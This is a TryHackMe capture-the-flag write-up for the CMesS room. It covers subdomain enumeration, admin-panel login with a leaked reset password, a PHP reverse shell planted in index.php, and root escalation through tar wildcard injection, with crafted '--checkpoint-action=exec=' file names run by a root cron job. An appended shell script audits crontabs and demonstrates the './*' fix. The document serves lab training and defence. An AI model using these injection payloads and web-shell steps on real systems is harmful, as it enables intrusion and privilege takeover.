CMesS Writeup
tryhackme/cmess
Setup
- Add `cmess.thm` to hosts file as instructed
Enumeration
- Scanning
  - Rustscan says ssh and http are available
  - Feroxbuster doesn’t show much interesting stuff
  - admin panel is at `/admin`
  - there is a `/src` directory tree but everything is 403 access denied
- Use burp intruder to scan subdomains (see hint 1)
  - Send request for `/` to intruder (ctrl+I)
  - Use intruder to modify Host header (`Host: §§.cmess.thm`)
  - Import some payloads, I used `/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt`
  - Start attack
  - `dev.cmess.thm` contains password reset for andre:XXXXXXXXXXX
Exploitation
Initial shell
- Use the password reset we found to login into `/admin` as `andre@cmess.thm`
- Use file manager to modify index.php and add reverse shell (revshells.com - PHP PenTestMonkey)
Getting ssh access
- Access reverse shell (navigate to `/` in browser)
- Looked for suid: `find / -perm /6000 -type f -executable 2>/dev/null` - nothing
- `sudo -l` - nothing
- Cannot access /home/andre
- In /opt there is a file called `.password.bak`; `/opt/.password.bak` contains a plaintext password 🤔
- Use this password to login with ssh as andre
- Now we can access `/home/andre/user.txt`
Privilege escalation
- In andre’s home folder he has a folder called backup
- The note contained here says everything in the folder will get backed up
- After finding no SUID bins earlier and checking `sudo -l` it’s a pretty easy guess that the backup script will allow for privesc
- Proceed to search for the script that does the backing up
  - `find / -iname "*backup*" 2>/dev/null` - nothing
  - `crontab -e` - nothing
  - `vim /etc/crontab` - bingo
```
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/2 * * * * root cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *
```
- Backup uses tar followed by a `*`, meaning we can abuse unsafe shell expansion
- gtfobins has a nice guide for how to get tar to exec commands
- The `*` in `cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *` will expand to the names of the files in `/home/andre/backup`
- This means by creating files in this directory we can control the arguments to tar and execute the exploit described on gtfobins
- There are some limitations to this though, as file names cannot contain some characters like `/`
- I find the easiest way for me to create files with weird names like `--checkpoint=1` is with vim, see below
- Ended up just chmodding `/root` to 777 (easier than trying to get a shell)
Setting arguments with bash file expansion
When a command contains a `*` the shell will automatically expand this `*` to a space-separated list of file names in the current directory.
To exploit this we need to come up with a command to execute that contains no `/`. Here I will use `chmod -R 777 $HOME`: all we need to do is read /root/root.txt, and after the chmod we can read this file as our current user.
The command we are aiming to execute is
`cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz --checkpoint=1 "--checkpoint-action=exec=chmod -R 777 $HOME"`
To do this we first cd to /home/andre/backup
Then create the first argument with vim
- run `vim`
- type `:wq --checkpoint=1`
Then the second argument
- run `vim`
- type `:wq --checkpoint-action=exec=chmod\ -R\ 777\ \$HOME`
When you run ls the output should look like this
```
andre@cmess:~/backup$ ls
--checkpoint=1 --checkpoint-action=exec=chmod -R 777 $HOME note
```
After cron executes the job you will be able to cat the final flag :)
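The two things a defender wants from the cron entry and the expansion explanation above, as an added example (this is not code from the original writeup; the crontab lines and file names it uses are constructed here): a small POSIX sh audit that flags `tar` jobs run over a bare `*` glob, and a demonstration of why anchoring the glob as `./*` makes a file named `--checkpoint=1` reach tar as a path instead of an option. It assumes the standard six-field `/etc/crontab` layout (five schedule fields plus the user column) and the GNU tar convention that an argument starting with `-` is parsed as an option.

```shell
#!/bin/sh
# Added example, not part of the original writeup. Two defensive checks for
# the /etc/crontab pattern above: (1) flag cron commands that run tar on a
# bare "*" glob, and (2) show that "./*" keeps attacker-named files from being
# parsed as tar options. All file and crontab contents are constructed here.

# Strip the five schedule fields and the user field of a system crontab line,
# leaving only the command (assumes the standard /etc/crontab layout).
cron_command() {
    printf '%s\n' "$1" | awk '{ for (i = 1; i <= 6; i++) $i = ""; sub(/^ +/, ""); print }'
}

# True (exit 0) when the command invokes tar with a bare "*" glob that the
# shell expands: any file whose name starts with "-" then arrives as an option.
# A glob written "./*" or placed after "--" is treated as safe.
is_unsafe_tar_glob() {
    cmd=$(cron_command "$1")
    case " $cmd " in
        *" tar "*) ;;                        # only tar invocations matter here
        *) return 1 ;;
    esac
    case " $cmd " in
        *" -- *"*|*" ./*"*) return 1 ;;      # anchored glob or end-of-options marker
    esac
    case " $cmd " in
        *" * "*) return 0 ;;                 # bare "*" token
    esac
    return 1
}

# Print every flagged line of a crontab file, prefixed with "UNSAFE:".
audit_crontab() {
    while IFS= read -r line || [ -n "$line" ]; do
        case $line in \#*|"") continue ;; esac   # skip comments and blank lines
        if is_unsafe_tar_glob "$line"; then
            printf 'UNSAFE: %s\n' "$line"
        fi
    done < "$1"
}

# Expand glob $2 inside directory $1 and report each token the way tar's
# option parser would see it: OPTION if it starts with "-", otherwise FILE.
classify_glob() {
    ( cd "$1" && for tok in $2; do
          case $tok in
              -*) printf 'OPTION %s\n' "$tok" ;;
              *)  printf 'FILE %s\n' "$tok" ;;
          esac
      done )
}

# --- constructed sample data -------------------------------------------------
DEMO_DIR=$(mktemp -d)
trap 'rm -rf "$DEMO_DIR"' EXIT
BACKUP_DIR="$DEMO_DIR/backup"
mkdir "$BACKUP_DIR"
: > "$BACKUP_DIR/note"
: > "$BACKUP_DIR/--checkpoint=1"       # attacker-style file name from the writeup
DEMO_CRON="$DEMO_DIR/crontab"
cat > "$DEMO_CRON" <<'EOF'
# constructed crontab: one ordinary system job, the vulnerable job, and a fixed one
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/2 * * * * root cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *
*/2 * * * * root cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz ./*
EOF

audit_crontab "$DEMO_CRON"
echo "bare glob:";     classify_glob "$BACKUP_DIR" '*'
echo "anchored glob:"; classify_glob "$BACKUP_DIR" './*'
```

Running it prints the one flagged crontab line, then the two expansions: with `*` the first token is reported as `OPTION --checkpoint=1`, with `./*` both tokens are files. The fix for the job in this room is the same command with `./*` in place of `*`, and the audit is worth running over `/etc/crontab` and `/etc/cron.d/*` on any host where a root job runs tar over a wildcard in a directory a lower-privileged user can write to.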
tags: writeup - tryhackme